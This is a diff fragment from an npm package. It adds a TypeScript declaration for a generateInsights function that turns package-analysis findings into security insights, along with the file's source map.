+import type { PackageAnalysis, AIInsight } from '../../types/index.js';
+/**
+ * Generate actionable security insights for findings
+ */
+export declare function generateInsights(analysis: PackageAnalysis, includeMitigation?: boolean): AIInsight[];
+//# sourceMappingURL=insight-generator.d.ts.map

package/dist/ai/analyzers/insight-generator.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"insight-generator.d.ts","sourceRoot":"","sources":["../../../src/ai/analyzers/insight-generator.ts"],"names":[],"mappings":"AAAA,uEAAuE;AAEvE,OAAO,KAAK,EAAE,eAAe,EAAW,SAAS,EAAa,MAAM,sBAAsB,CAAC;AAE3F;;GAEG;AACH,wBAAgB,gBAAgB,CAC9B,QAAQ,EAAE,eAAe,EACzB,iBAAiB,GAAE,OAAc,GAChC,SAAS,EAAE,CAqBb"}